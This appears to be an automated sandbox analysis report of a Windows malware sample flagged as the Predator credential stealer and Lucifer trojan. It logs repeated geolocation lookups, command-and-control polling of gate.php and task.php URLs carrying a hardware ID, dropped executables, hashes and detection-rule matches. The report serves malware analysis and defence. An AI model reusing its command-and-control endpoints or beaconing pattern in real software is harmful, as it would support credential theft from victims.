                                                                                                              Nov 24, 2022 10:06:32.594750881 CET846OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:32.705264091 CET846INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:32 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:32.814179897 CET846OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:32.925527096 CET847INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:32 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:33.032474041 CET847OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:33.187192917 CET847INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:33 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:33.298073053 CET847OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:33.404689074 CET848INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:33 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:33.516836882 CET848OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:33.634458065 CET848INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:33 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:33.735600948 CET848OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:33.843596935 CET849INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:33 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:33.954220057 CET849OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:06:34.107176065 CET849INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:06:34 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:06:34.220388889 CET850OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              15192.168.2.549704208.95.112.180C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:53.004415035 CET820OUTGET /json/ HTTP/1.1
                                                                                                              Host: ip-api.com
                                                                                                              Nov 24, 2022 10:05:53.042753935 CET820INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:52 GMT
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              Content-Length: 293
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Ttl: 21
                                                                                                              X-Rl: 39
                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 7d
                                                                                                              Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.49"}


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              2192.168.2.549690208.95.112.180C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:14.147728920 CET2OUTGET /json/ HTTP/1.1
                                                                                                              Host: ip-api.com
                                                                                                              Nov 24, 2022 10:05:14.181540966 CET3INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:13 GMT
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              Content-Length: 293
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Ttl: 60
                                                                                                              X-Rl: 44
                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 7d
                                                                                                              Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.49"}


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              3192.168.2.549691208.95.112.180C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:23.544753075 CET3OUTGET /json/ HTTP/1.1
                                                                                                              Host: ip-api.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 24, 2022 10:05:23.579479933 CET4INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:22 GMT
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              Content-Length: 293
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Ttl: 50
                                                                                                              X-Rl: 43
                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 7d
                                                                                                              Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.49"}


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              4192.168.2.54969213.90.128.25380C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:25.056792021 CET4OUTGET /wp-content/lock/gate.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 24, 2022 10:05:25.227658033 CET5INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:25 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 4
                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf 30
                                                                                                              Data Ascii: 0
                                                                                                              Nov 24, 2022 10:05:25.769961119 CET5OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:25.876641035 CET5INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:25 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              5192.168.2.549693208.95.112.180C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:29.208549976 CET6OUTGET /json/ HTTP/1.1
                                                                                                              Host: ip-api.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 24, 2022 10:05:29.242099047 CET6INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:28 GMT
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              Content-Length: 293
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Ttl: 44
                                                                                                              X-Rl: 42
                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 7d
                                                                                                              Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.49"}


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              6192.168.2.549694208.95.112.180C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:30.283818960 CET7OUTGET /json/ HTTP/1.1
                                                                                                              Host: ip-api.com
                                                                                                              Nov 24, 2022 10:05:30.317295074 CET8INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:29 GMT
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              Content-Length: 293
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Ttl: 43
                                                                                                              X-Rl: 41
                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 7d
                                                                                                              Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.49"}


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              7192.168.2.549695208.95.112.180C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:30.704683065 CET8OUTGET /json/ HTTP/1.1
                                                                                                              Host: ip-api.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 24, 2022 10:05:30.759912014 CET9INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:30 GMT
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              Content-Length: 293
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Ttl: 33
                                                                                                              X-Rl: 42
                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 7d
                                                                                                              Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.49"}


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              8192.168.2.54969613.90.128.25380C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:31.007345915 CET9OUTGET /wp-content/lock/gate.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 24, 2022 10:05:31.170663118 CET10INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:31 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2022 10:05:34.650249004 CET10OUTGET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1
                                                                                                              Host: 13.90.128.253
                                                                                                              Nov 24, 2022 10:05:34.803006887 CET10INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:34 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.3.11
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Mod-Pagespeed: 1.13.35.2-0
                                                                                                              Cache-Control: max-age=0, no-cache, s-maxage=10
                                                                                                              Content-Length: 3
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: ef bb bf
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              9192.168.2.549697208.95.112.180C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2022 10:05:39.421231031 CET11OUTGET /json/ HTTP/1.1
                                                                                                              Host: ip-api.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 24, 2022 10:05:39.459541082 CET11INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 24 Nov 2022 09:05:38 GMT
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              Content-Length: 293
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Ttl: 34
                                                                                                              X-Rl: 40
                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 7d
                                                                                                              Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.49"}


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:10:05:01
                                                                                                              Start date:24/11/2022
                                                                                                              Path:C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              Imagebase:0x630000
                                                                                                              File size:547374 bytes
                                                                                                              MD5 hash:0D43B051C7C73233C85697219BC9A4F4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Predator, Description: Yara detected Predator, Source: 00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: 00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                              • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: 00000000.00000002.563811537.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:low

                                                                                                              General

                                                                                                              Target ID:1
                                                                                                              Start time:10:05:21
                                                                                                              Start date:24/11/2022
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\Zip.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Zip.exe"
                                                                                                              Imagebase:0x1c391990000
                                                                                                              File size:32256 bytes
                                                                                                              MD5 hash:AF07E88EC22CC90CEBFDA29517F101B9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: 00000001.00000000.338062732.000001C391992000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                                                                                                              • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Zip.exe, Author: unknown
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 77%, ReversingLabs
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Target ID:2
                                                                                                              Start time:10:05:25
                                                                                                              Start date:24/11/2022
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\update_222410.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\update_222410.exe" / start
                                                                                                              Imagebase:0x840000
                                                                                                              File size:547374 bytes
                                                                                                              MD5 hash:0D43B051C7C73233C85697219BC9A4F4
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:10:05:26
                                                                                                              Start date:24/11/2022
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\update_222410.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\update_222410.exe" / start
                                                                                                              Imagebase:0x6b0000
                                                                                                              File size:547374 bytes
                                                                                                              MD5 hash:0D43B051C7C73233C85697219BC9A4F4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
